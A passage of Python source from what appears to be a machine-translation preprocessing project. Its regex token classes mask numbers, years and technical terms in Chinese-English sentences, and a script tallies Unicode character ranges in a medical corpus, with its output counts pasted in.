tmp = (j, lj)
__ += 1
elif ((tmp[0][0] > j[0]) and (tmp[0][1] > j[1]) and (tmp[0][0] < j[1])) or (
(tmp[0][0] < j[0]) and (tmp[0][1] < j[1]) and (tmp[0][1] > j[0])):
tmp = tmp if tmp[1] >= lj else (j, lj)
__ += 1
else:
pass
filter_piece_tmp.append(tmp)
his_ = _
filter_piece_tmp = sorted(list(set(filter_piece_tmp)))
filter_piece_tmp = list(zip(*filter_piece_tmp))
return filter_piece_tmp[0]
def execute_token(self, tokens, filter=True):
for token_name in tokens.get_token_name:
tk = getattr(tokens, token_name)
pattern = tk.process(self.sent)
for pos in pattern:
if pos not in self.level_dict or self.level_dict[pos] < tk.level:
self.level_dict[pos] = tk.level
self.pos_dict[pos] = tk.rep
# self.token_dict[tk.rep] = []
if filter:
self.filter_piece = self.max_length_subpiece(self.level_dict)
else:
self.filter_piece = self.level_dict.keys()
for pos in self.filter_piece:
self.filter_pos_dict[pos] = self.pos_dict[pos]
# self.token_dict[self.pos_dict[pos]].append(re.sub(" ", "", self.sent[pos[0]:pos[1]]))
return self.filter_pos_dict # self.token_dict
@property
def sub_token(self):
if self.result:
return self.result
else:
piece_keys = sorted(self.filter_pos_dict.keys())
ppp = [0] + [i for p in piece_keys for i in p] + [len(self.sent)]
ppp = [(ppp[2 * i], ppp[2 * i + 1]) for i in range(len(ppp) // 2)]
result_ = [self.sent[ppp[0][0]:ppp[0][1]]]
for k, p in enumerate(piece_keys):
result_.append(self.filter_pos_dict[piece_keys[k]])
result_.append(self.sent[ppp[k + 1][0]:ppp[k + 1][1]])
# TODO: how to get the border of words? here we can use " ".join(result_)
# any better idea?
self.result = " ".join(result_)
self.sub_order_dict = [(self.filter_pos_dict[pos], self.sent[pos[0]:pos[1]]) for pos in piece_keys]
return self.result
def sub_sent(sent, sub_order_dict):
for rep, target in sub_order_dict:
m = re.search(rep, sent)
sent = sent[:m.start()] + target + sent[m.end():] if m is not None else sent
return sent
def decode_sent(sents, sents_dict):
bad_sents = []
decode = []
for k, (sent, sub_dict) in enumerate(zip(sents, sents_dict)):
try:
if len(sub_dict) > 0:
decode.append(sub_sent(sent, sub_dict))
else:
decode.append(sent)
except Exception as e:
bad_sents.append([sent, sub_dict])
decode.append(sent)
return decode, bad_sents
```
#### File: t2t-learning/processutils/analyze.py
```python
import re
from processutils.regexutils import pattern_sub_pts
from processutils.regexutils import pattern_find_pts
from processutils.regexutils import mask_update
class RePattern(object):
@staticmethod
def regex_between_enzh(regex):
return f"\\b{regex}(?=[\\u4e00-\\u9fff]|\\b)|(?<=[\\u4e00-\\u9fff]){regex}(?=[\\u4e00-\\u9fff]|\\b)"
class TokenRegexProcess(object):
level = 1
regex = " "
rep = "\\uf000"
@classmethod
def process(cls, sent):
# TODO: SubwordTextEncoder, and the paper with group sub
matcher = re.finditer(cls.regex, sent)
pattern = []
for k, m in enumerate(matcher):
pattern.append(m.span())
return pattern
class TokenSubProcess(object):
level = 1
sub_dict = {" ": " "}
rep = "\\uf000"
@classmethod
def process(cls, sent):
pattern = []
for src_wd, tgt_wd in cls.sub_dict.items():
matcher = re.finditer(re.escape(src_wd), sent)
pattern = []
for k, m in enumerate(matcher):
pattern.append(m.span())
return pattern
class Token(object):
def __init__(self):
self.level_map = {}
self.level_map = self.get_token_level
@property
def get_token_name(self):
# bad
return ["PercentDecimal", "PercentInteger", "NumericDecimal", "NumericInteger", "NumericYear", "TermUpperCase",
"TermCamelCase", "TermEnCharWithNum", "TermChemicalPrefix"]
@property
def get_token_level(self):
if len(self.level_map) == 0:
for token_name in self.get_token_name:
token = getattr(self, token_name)
token_level = token.level
self.level_map[token_name] = token_level
return self.level_map
def set_token_level(self, level_map_part):
for token_name, token_level in level_map_part.items():
self.level_map[token_name] = token_level
class PercentDecimal(TokenRegexProcess):
level = 1
"""55.55%,必须是小数,允许空格"""
regex = "[0-9][0-9 ]*\.[0-9 ]*[0-9] *%"
rep = "PercentDecimal"
class PercentInteger(TokenRegexProcess):
level = 0.9
"""100%,必须是整数,允许空格"""
regex = "[0-9][0-9 ]* *%"
rep = "PercentInteger"
class NumericDecimal(TokenRegexProcess):
level = 1
"""55.55"""
regex = "[0-9][0-9 ]*\.[0-9 ]*[0-9]"
rep = "NumericDecimal"
class NumericInteger(TokenRegexProcess):
level = 0
"""5"""
regex = "[0-9][0-9 ]*[0-9]|[0-9]"
rep = "NumericInteger"
class NumericYear(TokenRegexProcess):
level = 0.9
"""2009"""
regex = RePattern.regex_between_enzh("1[5-9][0-9]{2}") + '|' + RePattern.regex_between_enzh("20[0-9]{2}")
rep = "NumericYear"
class TermUpperCase(TokenRegexProcess):
level = 0.2
"""DNA"""
regex = RePattern.regex_between_enzh("[A-Z]+")
rep = "TermUpperCase"
class TermCamelCase(TokenRegexProcess):
level = 0.1
"""pH,PubMed, LoL, but not DNA, ID"""
regex = RePattern.regex_between_enzh("[A-Za-z]+[A-Z]+[A-Za-z]*")
rep = "TermCamelCase"
class TermEnCharWithNum(TokenRegexProcess):
level = 0.3
"""EP2"""
regex = RePattern.regex_between_enzh("[0-9]*(?:[a-z]*[A-Z]+[a-z]*[0-9]+)+[A-Za-z]*") + "|" + \
RePattern.regex_between_enzh("[A-Za-z]*(?:[0-9]+[a-z]*[A-Z]+[a-z]*)+[0-9]*")
rep = "TermEnCharWithNum"
class TermChemicalPrefix(TokenRegexProcess):
level = 0.3
"""1,3,7-"""
regex = "(?<![\w\-])([0-9]+ *[,,] *)*[0-9]+\-(?=[A-Za-z\\u4e00-\\u9fff])"
rep = "TermChemicalPrefix"
class RomanNum(TokenSubProcess):
level = 1
"""Ⅱ"""
sub_dict = {" ": " "}
rep = "RomanNum"
class SentTokenInfo(object):
def __init__(self, sent):
self.sent = sent
# self.token_dict = {}
self.level_dict = {}
self.pos_dict = {}
self.filter_piece = []
self.filter_pos_dict = {}
self.result = ""
self.sub_order_dict = []
@staticmethod
def sub_space(targets):
return [re.sub(" ", "", target) for target in targets]
@staticmethod
def max_length_subpiece(piece_level_dict):
"""
pos:[(1,2), (3,4), (1,4)] and level:[2, 2, 1] -> [(1,4)]
pos:[(2,4), (3,5), (5,8)] and level:[1, 2, 1] -> [(3,5), (5,8)]
"""
piece_keys = sorted(piece_level_dict.keys())
if len(piece_keys) == 0:
return []
filter_piece_tmp = []
__ = 0
his_ = 0
for _, i in enumerate(piece_keys):
if (_ <= his_ + __) and (_ > 0):
continue
__ = 0
li = piece_level_dict[i]
tmp = (i, li)
for j in piece_keys:
lj = piece_level_dict[j]
if tmp[0] == j:
pass
elif ((tmp[0][0] < j[0]) and (tmp[0][1] >= j[1])) or ((tmp[0][0] <= j[0]) and (tmp[0][1] > j[1])):
tmp = tmp
__ += 1
elif ((tmp[0][0] >= j[0]) and (tmp[0][1] < j[1])) or ((tmp[0][0] > j[0]) and (tmp[0][1] <= j[1])):
tmp = (j, lj)
__ += 1
elif ((tmp[0][0] > j[0]) and (tmp[0][1] > j[1]) and (tmp[0][0] < j[1])) or (
(tmp[0][0] < j[0]) and (tmp[0][1] < j[1]) and (tmp[0][1] > j[0])):
tmp = tmp if tmp[1] >= lj else (j, lj)
__ += 1
else:
pass
filter_piece_tmp.append(tmp)
his_ = _
filter_piece_tmp = sorted(list(set(filter_piece_tmp)))
filter_piece_tmp = list(zip(*filter_piece_tmp))
return filter_piece_tmp[0]
def execute_token(self, tokens, filter=True):
for token_name in tokens.get_token_name:
tk = getattr(tokens, token_name)
pattern = tk.process(self.sent)
for pos in pattern:
if pos not in self.level_dict or self.level_dict[pos] < tk.level:
self.level_dict[pos] = tk.level
self.pos_dict[pos] = tk.rep
# self.token_dict[tk.rep] = []
if filter:
self.filter_piece = self.max_length_subpiece(self.level_dict)
else:
self.filter_piece = self.level_dict.keys()
for pos in self.filter_piece:
self.filter_pos_dict[pos] = self.pos_dict[pos]
# self.token_dict[self.pos_dict[pos]].append(re.sub(" ", "", self.sent[pos[0]:pos[1]]))
return self.filter_pos_dict # self.token_dict
@property
def sub_token(self):
if self.result:
return self.result
else:
piece_keys = sorted(self.filter_pos_dict.keys())
ppp = [0] + [i for p in piece_keys for i in p] + [len(self.sent)]
ppp = [(ppp[2 * i], ppp[2 * i + 1]) for i in range(len(ppp) // 2)]
result_ = [self.sent[ppp[0][0]:ppp[0][1]]]
for k, p in enumerate(piece_keys):
result_.append(self.filter_pos_dict[piece_keys[k]])
result_.append(self.sent[ppp[k + 1][0]:ppp[k + 1][1]])
# TODO: how to get the border of words? here we can use " ".join(result_)
# any better idea?
self.result = " ".join(result_)
self.sub_order_dict = [(self.filter_pos_dict[pos], self.sent[pos[0]:pos[1]].replace(" ", "")) for pos in
piece_keys]
return self.result
def sub_sent(sent, sub_order_dict):
for rep, target in sub_order_dict:
m = re.search(rep, sent)
sent = sent[:m.start()] + target + sent[m.end():] if m is not None else sent
return sent
def decode_sent(sents, sents_dict):
bad_sents = []
decode = []
for k, (sent, sub_dict) in enumerate(zip(sents, sents_dict)):
try:
if len(sub_dict) > 0:
decode.append(sub_sent(sent, sub_dict))
else:
decode.append(sent)
except Exception as e:
bad_sents.append([sent, sub_dict])
decode.append(sent)
return decode, bad_sents
def translate_afterprocess(line):
line = re.sub(" +([,.?!:;'’”})\\]、,。?!:;)】》])", "\\1", line)
line = re.sub("([,.?!:;'’”})\\]] |[、,。?!:;)】》]) +", "\\1", line)
line = re.sub("([‘“{(\\[(【《]) +", "\\1", line)
line = re.sub(" +( [‘“{(\\[]|[(【《])", "\\1", line)
mask = [0] * len(line)
# \\b[A-Z]\\. [a-z]+\\b from corpus
case_store = ["e. g.", "i. e.", "E. coli", "S. aureus", "O. aureus", "C. indicum", "C. funicola", "M. pusillum"]
case_regex = "|".join([re.escape(c) for c in case_store])
case_mask = pattern_find_pts(case_regex, line, mask=mask)
mask_update(mask, case_mask)
def upper_after_endmark(m):
pattern = m.group(0)
if len(pattern) == 1 and pattern.islower():
return pattern.upper()
else:
return pattern
line = pattern_sub_pts("(?<=[.?!;] )[a-z]|(?<=[。?!;])[a-z]|(?<=^)[a-z]", upper_after_endmark, line, mask=mask)
line = re.sub("(?<=[\\u4e00-\\u9fff]) +(?=[\\u4e00-\\u9fff])|"
"(?<=[\\u4e00-\\u9fff]) +(?=\\w)|"
"(?<=[\\w]) +(?=[\\u4e00-\\u9fff])", "", line)
line = re.sub(" *([+±=*/<>≤≥_~′″]) *", "\\1", line)
line = re.sub("(?<!,) *\\- *", "-", line)
return line
def decode_afterprocess(sents):
return [translate_afterprocess(sent) for sent in sents]
```
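A rough mask-translate-restore sketch of how these pieces appear to fit together. Assumptions: the token classes are nested attributes of `Token` (as `get_token_name`/`getattr` imply), the module and its `processutils` dependencies are importable, the example sentence is made up, and the translation step is stubbed out:
```python
tokens = Token()
info = SentTokenInfo("给药组DNA含量为55.5%,研究始于2009年。")
info.execute_token(tokens)                  # locate token spans and keep the strongest ones
masked = info.sub_token                     # spans replaced by placeholders such as TermUpperCase
translated = masked                         # a real MT system would translate the masked sentence
restored, bad = decode_sent([translated], [info.sub_order_dict])
print(masked)
print(translate_afterprocess(restored[0]))  # restore originals, then clean spacing and casing
```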
#### File: t2t-learning/qa/char_analyze.py
```python
from collections import Counter
import qa.regex_utils as regutil
import re
resource_path = "/media/tmxmall/a36811aa-0e87-4ba1-b14f-370134452449/data/medicine.txt"
with open(resource_path, "r", encoding="utf8") as f:
char_stream = f.read()
char_dictionary = Counter(list(char_stream))
med_unicodes = regutil.expr_converter("[[%s]]" % "".join(char_dictionary.keys()).replace("\n", "") + "#[[\\u4e00-\\u9fff]]")
format_med_unicodes = re.sub("(?<!-)(?=\\\\u)", "\n", med_unicodes)
print(format_med_unicodes)
lines = char_stream.split("\n")
unknown_char = "[^\\u0020-\\u007e\\u4e00-\\u9fff]"
def regex_filter_line(regex, lines):
filter_sentence = list(filter(lambda x: re.search(regex, x) is not None, lines))
print("%20s" % regex, len(filter_sentence))
return len(filter_sentence)
regutil.uu_enum("\\u0020-\\u007e")
regex_filter_line("[\\u0020-\\u007e]", lines)
regex_filter_line("[\\u00a0-\\u00ff]", lines)
regex_filter_line("[\\u0100-\\u01ff]", lines)
regex_filter_line("[\\u0251]", lines)
regex_filter_line("[\\u025b]", lines)
regex_filter_line("[\\u0261]", lines)
regex_filter_line("[\\u028a]", lines)
regex_filter_line("[\\u02c6-\\u02cb]", lines)
regex_filter_line("[\\u02d0]", lines)
regex_filter_line("[\\u02d8-\\u02da]", lines)
regex_filter_line("[\\u02dc]", lines)
regex_filter_line("[\\u037a]", lines)
regex_filter_line("[\\u037e]", lines)
regex_filter_line("[\\u038a]", lines)
regex_filter_line("[\\u038c]", lines)
regex_filter_line("[\\u03cb]", lines)
regex_filter_line("[\\u03d6]", lines)
regex_filter_line("[\\u0384-\\u0385]", lines)
regex_filter_line("[\\u0387-\\u0388]", lines)
regex_filter_line("[\\u038e-\\u038f]", lines)
regex_filter_line("[\\u0391-\\u03c9]", lines)
regex_filter_line("[\\u0400-\\u04ff]", lines)
regex_filter_line("[\\u0590-\\u05ff]", lines)
regex_filter_line("[\\u0652]", lines)
regex_filter_line("[\\u11bc]", lines)
regex_filter_line("[\\u1868]", lines)
regex_filter_line("[\\u1d31]", lines)
regex_filter_line("[\\u1d52]", lines)
regex_filter_line("[\\u1d5b]", lines)
regex_filter_line("[\\u1ef7]", lines)
regex_filter_line("[\\u2016-\\u206a]", lines)
regex_filter_line("[\\u2070]", lines)
regex_filter_line("[\\u2074-\\u2075]", lines)
regex_filter_line("[\\u2077-\\u2078]", lines)
regex_filter_line("[\\u2082-\\u2084]", lines)
regex_filter_line("[\\u20ac]", lines)
regex_filter_line("[\\u2103]", lines)
regex_filter_line("[\\u2105]", lines)
regex_filter_line("[\\u2109]", lines)
regex_filter_line("[\\u2116]", lines)
regex_filter_line("[\\u2122]", lines)
regex_filter_line("[\\u212b]", lines)
regex_filter_line("[\\u2160-\\u216b]", lines)
regex_filter_line("[\\u2170-\\u2179]", lines)
regex_filter_line("[\\u21d2]", lines)
regex_filter_line("[\\u2190-\\u2193]", lines)
regex_filter_line("[\\u2206]", lines)
regex_filter_line("[\\u2208]", lines)
regex_filter_line("[\\u2211-\\u2212]", lines)
regex_filter_line("[\\u2217-\\u221a]", lines)
regex_filter_line("[\\u221d-\\u2220]", lines)
regex_filter_line("[\\u2223]", lines)
regex_filter_line("[\\u2225]", lines)
regex_filter_line("[\\u2227-\\u222b]", lines)
regex_filter_line("[\\u222e]", lines)
regex_filter_line("[\\u2234]", lines)
regex_filter_line("[\\u2237]", lines)
regex_filter_line("[\\u223c-\\u223d]", lines)
regex_filter_line("[\\u2245]", lines)
regex_filter_line("[\\u224c]", lines)
regex_filter_line("[\\u2252]", lines)
regex_filter_line("[\\u2260-\\u2261]", lines)
regex_filter_line("[\\u2264-\\u2267]", lines)
regex_filter_line("[\\u226f]", lines)
regex_filter_line("[\\u2295]", lines)
regex_filter_line("[\\u2299]", lines)
regex_filter_line("[\\u22a5]", lines)
regex_filter_line("[\\u22bf]", lines)
regex_filter_line("[\\u2312]", lines)
regex_filter_line("[\\u2395]", lines)
regex_filter_line("[\\u2460-\\u2473]", lines)
regex_filter_line("[\\u2474-\\u2487]", lines)
regex_filter_line("[\\u2488-\\u249b]", lines)
regex_filter_line("[\\u2500-\\u257f]", lines)
regex_filter_line("[\\u25a0-\\u25a1]", lines)
regex_filter_line("[\\u25b2-\\u25b4]", lines)
regex_filter_line("[\\u25c6-\\u25c7]", lines)
regex_filter_line("[\\u25ca-\\u25cb]", lines)
regex_filter_line("[\\u25ce-\\u25cf]", lines)
regex_filter_line("[\\u2605-\\u2606]", lines)
regex_filter_line("[\\u2609]", lines)
regex_filter_line("[\\u2610]", lines)
regex_filter_line("[\\u2640]", lines)
regex_filter_line("[\\u2642]", lines)
regex_filter_line("[\\u2666]", lines)
regex_filter_line("[\\u266a-\\u266b]", lines)
regex_filter_line("[\\u2714]", lines)
regex_filter_line("[\\u2717]", lines)
regex_filter_line("[\\u274f]", lines)
regex_filter_line("[\\u2751]", lines)
regex_filter_line("[\\u279f]", lines)
regex_filter_line("[\\u27a2]", lines)
regex_filter_line("[\\u27a5]", lines)
regex_filter_line("[\\u2a7d]", lines)
regex_filter_line("[\\u2fd4]", lines)
regex_filter_line("[\\u3001-\\u301e]", lines)
regex_filter_line("[\\u3022-\\u3025]", lines)
regex_filter_line("[\\u3105-\\u3107]", lines)
regex_filter_line("[\\u310a]", lines)
regex_filter_line("[\\u3111]", lines)
regex_filter_line("[\\u3113]", lines)
regex_filter_line("[\\u3116-\\u3117]", lines)
regex_filter_line("[\\u311a-\\u311b]", lines)
regex_filter_line("[\\u3122]", lines)
regex_filter_line("[\\u3125]", lines)
regex_filter_line("[\\u3127-\\u3128]", lines)
regex_filter_line("[\\u3220-\\u3229]", lines)
regex_filter_line("[\\u32a3]", lines)
regex_filter_line("[\\u338e-\\u338f]", lines)
regex_filter_line("[\\u339c-\\u339d]", lines)
regex_filter_line("[\\u33a1]", lines)
regex_filter_line("[\\u33a5]", lines)
regex_filter_line("[\\u33d5]", lines)
regex_filter_line("[\\u33d1-\\u33d2]", lines)
regex_filter_line("[\\u359e]", lines)
regex_filter_line("[\\u39d1]", lines)
regex_filter_line("[\\u41f2]", lines)
regex_filter_line("[\\u4341]", lines)
regex_filter_line("[\\u4d13]", lines)
regex_filter_line("[\\u4d15]", lines)
regex_filter_line("[\\u4e00-\\u9fff]", lines)
regex_filter_line("[\\uacf3]", lines)
regex_filter_line("[\\ucd38]", lines)
regex_filter_line("[\\ue20c-\\ue2ff]", lines)
regex_filter_line("[\\uf900-\\ufaff]", lines)
regex_filter_line("[\\ufb03]", lines)
regex_filter_line("[\\ufe30-\\ufe31]", lines)
regex_filter_line("[\\ufe33]", lines)
regex_filter_line("[\\ufe38]", lines)
regex_filter_line("[\\ufe3c-\\ufe3d]", lines)
regex_filter_line("[\\ufe3f-\\ufe41]", lines)
regex_filter_line("[\\ufe4d-\\ufe4e]", lines)
regex_filter_line("[\\ufe55-\\ufe57]", lines)
regex_filter_line("[\\ufe59-\\ufe5c]", lines)
regex_filter_line("[\\ufe5f]", lines)
regex_filter_line("[\\ufe63]", lines)
regex_filter_line("[\\ufe65-\\ufe66]", lines)
regex_filter_line("[\\ufe6a-\\ufe6b]", lines)
regex_filter_line("[\\ufeff]", lines)
regex_filter_line("[\\uff01]", lines)
regex_filter_line("[\\uff08-\\uff09]", lines)
regex_filter_line("[\\uff0c]", lines)
regex_filter_line("[\\uff1a]", lines)
regex_filter_line("[\\uff1f]", lines)
regex_filter_line("[\\uff61]", lines)
regex_filter_line("[\\uff63]", lines)
regex_filter_line("[\\uff65]", lines)
regex_filter_line("[\\uff6c]", lines)
regex_filter_line("[\\uff72]", lines)
regex_filter_line("[\\uff86]", lines)
regex_filter_line("[\\uff89]", lines)
regex_filter_line("[\\uffe0-\\uffe1]", lines)
regex_filter_line("[\\uffe3]", lines)
regex_filter_line("[\\uffe5]", lines)
regex_filter_line("[\\uffed]", lines)
regex_filter_line("[\\ufffc]", lines)
"""
[\u0020-\u007e] 13056272 \\u0020-\\u007e Latin
[\u00a0-\u00ff] 258619 \\u00a0-\\u00ff Latin ++
[\u0100-\u01ff] 353 \\u0100-\\u01ff Latin ++
[\u0251] 302 \\u0251 ɑ
[\u025b] 2 \\u025b ɛ
[\u0261] 25 \\u0261 ɡ
[\u028a] 1 \\u028a ʊ
[\u02c6-\u02cb] 870 \\u02c6-\\u02cb ˆˇˈˉˊˋ
[\u02d0] 1 \\u02d0 ː
[\u02d8-\u02da] 25 \\u02d8-\\u02da ˘˙˚
[\u02dc] 10 \\u02dc ˜
[\u037a] 1 \\u037a ͺ
[\u037e] 4 \\u037e ;
[\u038a] 3 \\u038a Ί
[\u038c] 1 \\u038c Ό
[\u03cb] 3 \\u03cb ϋ
[\u03d6] 2 \\u03d6 ϖ
[\u0384-\u0385] 8 \\u0384-\\u0385 ΄΅
[\u0387-\u0388] 2 \\u0387-\\u0388 ·Έ
[\u038e-\u038f] 2 \\u038e-\\u038f ΎΏ
[\u0391-\u03c9] 567276 \\u0391-\\u03c9 Greek
[\u0400-\u04ff] 2058 \\u0400-\\u04ff Cyrillic
[\u0590-\u05ff] 34 \\u0590-\\u05ff Hebrew
[\u0652] 1 \\u0652 Arabic
[\u11bc] 3 \\u11bc Korean
[\u1868] 1 \\u1868 ᡨ Mongolian
[\u1d31] 1 \\u1d31 ᴱ
[\u1d52] 1 \\u1d52 ᵒ
[\u1d5b] 1 \\u1d5b ᵛ
[\u1ef7] 1 \\u1ef7 ỷ Latin ++
[\u2016-\u206a] 323353 \\u2016-\\u206a punc++
[\u2070] 4 \\u2070 ⁰
[\u2074-\u2075] 9 \\u2074-\\u2075 ⁴⁵
[\u2077-\u2078] 11 \\u2077-\\u2078 ⁷⁸
[\u2082-\u2084] 13 \\u2082-\\u2084 ₂₃₄
[\u20ac] 58 \\u20ac €
[\u2103] 132218 \\u2103 ℃
[\u2105] 64 \\u2105 ℅
[\u2109] 45 \\u2109 ℉
[\u2116] 559 \\u2116 №
[\u2122] 348 \\u2122 ™
[\u212b] 5 \\u212b Å
[\u2160-\u216b] 235239 \\u2160-\\u216b ⅠⅡⅢⅣⅤⅥⅦⅧⅨⅩⅪⅫ
[\u2170-\u2179] 1557 \\u2170-\\u2179 ⅰⅱⅲⅳⅴⅵⅶⅷⅸ
[\u21d2] 3 \\u21d2 ⇒
[\u2190-\u2193] 15107 \\u2190-\\u2193 ←↑→↓
[\u2206] 5 \\u2206 ∆
[\u2208] 281 \\u2208 ∈
[\u2211-\u2212] 839 \\u2211-\\u2212 ∑−
[\u2217-\u221a] 75 \\u2217-\\u221a ∗∘∙√
[\u221d-\u2220] 861 \\u221d-\\u2220 ∝∞∟∠
[\u2223] 1 \\u2223 ∣
[\u2225] 80 \\u2225 ∥
[\u2227-\u222b] 226 \\u2227-\\u222b ∧∨∩∪∫
[\u222e] 8 \\u222e ∮
[\u2234] 46 \\u2234 ∴
[\u2237] 333 \\u2237 ∷
[\u223c-\u223d] 29 \\u223c-\\u223d ∼∽
[\u2245] 1 \\u2245 ≅
[\u224c] 33 \\u224c ≌
[\u2252] 4 \\u2252 ≒
[\u2260-\u2261] 555 \\u2260-\\u2261 ≠≡
[\u2264-\u2267] 31397 \\u2264-\\u2267 ≤≥≦≧
[\u226f] 3 \\u226f ≯
[\u2295] 4 \\u2295 ⊕
[\u2299] 17 \\u2299 ⊙
[\u22a5] 41 \\u22a5 ⊥
[\u22bf] 116 \\u22bf ⊿
[\u2312] 5 \\u2312 ⌒
[\u2395] 4 \\u2395 ⎕
[\u2460-\u2473] 48470 \\u2460-\\u2473 ①②③④⑤⑥⑦⑧⑨⑩ ⑳
[\u2474-\u2487] 1267 \\u2474-\\u2487 ⑴⑵⑶⑷⑸⑹⑺⑻⑼⑽ ⒇
[\u2488-\u249b] 107 \\u2488-\\u249b ⒈⒉⒊⒋⒌⒍⒎⒏⒐⒑ ⒛
[\u2500-\u257f] 566 \\u2500-\\u257f ─━│┃┄┅┆┇┈┉┊
[\u25a0-\u25a1] 1052 \\u25a0-\\u25a1 ■□
[\u25b2-\u25b4] 3695 \\u25b2-\\u25b4 ▲△▴
[\u25c6-\u25c7] 205 \\u25c6-\\u25c7 ◆◇
[\u25ca-\u25cb] 339 \\u25ca-\\u25cb ◊○
[\u25ce-\u25cf] 767 \\u25ce-\\u25cf ◎●
[\u2605-\u2606] 196 \\u2605-\\u2606 ★☆
[\u2609] 3 \\u2609 ☉
[\u2610] 35 \\u2610 ☐
[\u2640] 1017 \\u2640 ♀
[\u2642] 1108 \\u2642 ♂
[\u2666] 2 \\u2666 ♦
[\u266a-\u266b] 9 \\u266a-\\u266b ♪♫
[\u2714] 4 \\u2714 ✔
[\u2717] 1 \\u2717 ✗
[\u274f] 1 \\u274f ❏
[\u2751] 2 \\u2751 ❑
[\u279f] 1 \\u279f ➟
[\u27a2] 6 \\u27a2 ➢
[\u27a5] 1 \\u27a5 ➥
[\u2a7d] 3 \\u2a7d ⩽
[\u2fd4] 2 \\u2fd4 ⿔ CJK++
[\u3001-\u301e] 7028921 \\u3001-\\u301e CJK punc
[\u3022-\u3025] 8 \\u3022-\\u3025 〢〣〤〥
[\u3105-\u3107] 8 \\u3105-\\u3107 ㄅㄆ
[\u310a] 1 \\u310a ㄊ
[\u3111] 1 \\u3111 ㄑ
[\u3113] 2 \\u3113 ㄓ
[\u3116-\u3117] 6 \\u3116-\\u3117 ㄖㄗ
[\u311a-\u311b] 2 \\u311a-\\u311b ㄚㄛ
[\u3122] 1 \\u3122 ㄢ
[\u3125] 1 \\u3125 ㄥ
[\u3127-\u3128] 11 \\u3127-\\u3128 ㄧㄨ
[\u3220-\u3229] 312 \\u3220-\\u3229 ㈠㈡㈢㈣㈤㈥㈦㈧㈨
[\u32a3] 6 \\u32a3 ㊣
[\u338e-\u338f] 125 \\u338e-\\u338f ㎎㎏
[\u339c-\u339d] 75 \\u339c-\\u339d ㎜㎝
[\u33a1] 59 \\u33a1 ㎡
[\u33a5] 1 \\u33a5 ㎥
[\u33d5] 24 \\u33d5 ㏕
[\u33d1-\u33d2] 9 \\u33d1-\\u33d2 ㏑㏒
[\u359e] 6 \\u359e 㖞
[\u39d1] 3 \\u39d1 㧑
[\u41f2] 13 \\u41f2 䇲
[\u4341] 2 \\u4341 䍁
[\u4d13] 2 \\u4d13 䴓
[\u4d15] 1 \\u4d15 䴕
[\u4e00-\u9fff] 13056199 \\u4e00-\\u9fff CJK
[\uacf3] 2 \\uacf3 곳 Korean++
[\ucd38] 1 \\ucd38 촸 Korean++
[\ue20c-\ue2ff] 1305 \\ue20c-\\ue2ff ???
[\uf900-\ufaff] 136 \\uf900-\\ufaff CJK ++
[\ufb03] 1 \\ufb03 ffi
[\ufe30-\ufe31] 941 \\ufe30-\\ufe31 ︰︱
[\ufe33] 2 \\ufe33 ︳
[\ufe38] 4 \\ufe38 ︸
[\ufe3c-\ufe3d] 33 \\ufe3c-\\ufe3d ︼︽
[\ufe3f-\ufe41] 19 \\ufe3f-\\ufe41 ︿﹀﹁
[\ufe4d-\ufe4e] 7 \\ufe4d-\\ufe4e ﹍﹎
[\ufe55-\ufe57] 102 \\ufe55-\\ufe57 ﹕﹖﹗
[\ufe59-\ufe5c] 185 \\ufe59-\\ufe5c ﹙﹚﹛
[\ufe5f] 10 \\ufe5f ﹟
[\ufe63] 70 \\ufe63 ﹣
[\ufe65-\ufe66] 551 \\ufe65-\\ufe66 ﹥﹦
[\ufe6a-\ufe6b] 233 \\ufe6a-\\ufe6b ﹪﹫
[\ufeff] 4 \\ufeff arabic ++ # FE70-FEFF
[\uff01] 886 \\uff01 !
[\uff08-\uff09] 622070 \\uff08-\\uff09 ()
[\uff0c] 3445520 \\uff0c ,
[\uff1a] 471609 \\uff1a :
[\uff1f] 9822 \\uff1f ?
[\uff61] 2 \\uff61 。
[\uff63] 1 \\uff63 」
[\uff65] 8 \\uff65 ・
[\uff6c] 2 \\uff6c ャ
[\uff72] 1 \\uff72 イ
[\uff86] 1 \\uff86 ニ
[\uff89] 1 \\uff89 ノ
[\uffe0-\uffe1] 160 \\uffe0-\\uffe1 ¢£
[\uffe3] 7143 \\uffe3  ̄
[\uffe5] 57 \\uffe5 ¥
[\uffed] 9 \\uffed ■
[\ufffc] 1 \\ufffc 
"""
"""
\\u0020-\\u007e Latin
\\u00a0-\\u00ff Latin ++
\\u0100-\\u01ff Latin ++
\\u0251 ɑ
\\u025b ɛ
\\u0261 ɡ
\\u028a ʊ
\\u02c6-\\u02cb ˆˇˈˉˊˋ
\\u02d0 ː
\\u02d8-\\u02da ˘˙˚
\\u02dc ˜
\\u037a ͺ
\\u037e ;
\\u038a Ί
\\u038c Ό
\\u03cb ϋ
\\u03d6 ϖ
\\u0384-\\u0385 ΄΅
\\u0387-\\u0388 ·Έ
\\u038e-\\u038f ΎΏ
\\u0391-\\u03c9 Greek
\\u0400-\\u04ff Cyrillic
\\u0590-\\u05ff Hebrew
\\u0652 Arabic
\\u11bc Korean
\\u1868 ᡨ Mongolian
\\u1d31 ᴱ
\\u1d52 ᵒ
\\u1d5b ᵛ
\\u1ef7 ỷ Latin ++
\\u2016-\\u206a punc++
\\u2070 ⁰
\\u2074-\\u2075 ⁴⁵
\\u2077-\\u2078 ⁷⁸
\\u2082-\\u2084 ₂₃₄
\\u20ac €
\\u2103 ℃
\\u2105 ℅
\\u2109 ℉
\\u2116 №
\\u2122 ™
\\u212b Å
\\u2160-\\u216b ⅠⅡⅢⅣⅤⅥⅦⅧⅨⅩⅪⅫ
\\u2170-\\u2179 ⅰⅱⅲⅳⅴⅵⅶⅷⅸ
\\u21d2 ⇒
\\u2190-\\u2193 ←↑→↓
\\u2206 ∆
\\u2208 ∈
\\u2211-\\u2212 ∑−
\\u2217-\\u221a ∗∘∙√
\\u221d-\\u2220 ∝∞∟∠
\\u2223 ∣
\\u2225 ∥
\\u2227-\\u222b ∧∨∩∪∫
\\u222e ∮
\\u2234 ∴
\\u2237 ∷
\\u223c-\\u223d ∼∽
\\u2245 ≅
\\u224c ≌
\\u2252 ≒
\\u2260-\\u2261 ≠≡
\\u2264-\\u2267 ≤≥≦≧
\\u226f ≯
\\u2295 ⊕
\\u2299 ⊙
\\u22a5 ⊥
\\u22bf ⊿
\\u2312 ⌒
\\u2395 ⎕
\\u2460-\\u2473 ①②③④⑤⑥⑦⑧⑨⑩ ⑳
\\u2474-\\u2487 ⑴⑵⑶⑷⑸⑹⑺⑻⑼⑽ ⒇
\\u2488-\\u249b ⒈⒉⒊⒋⒌⒍⒎⒏⒐⒑ ⒛
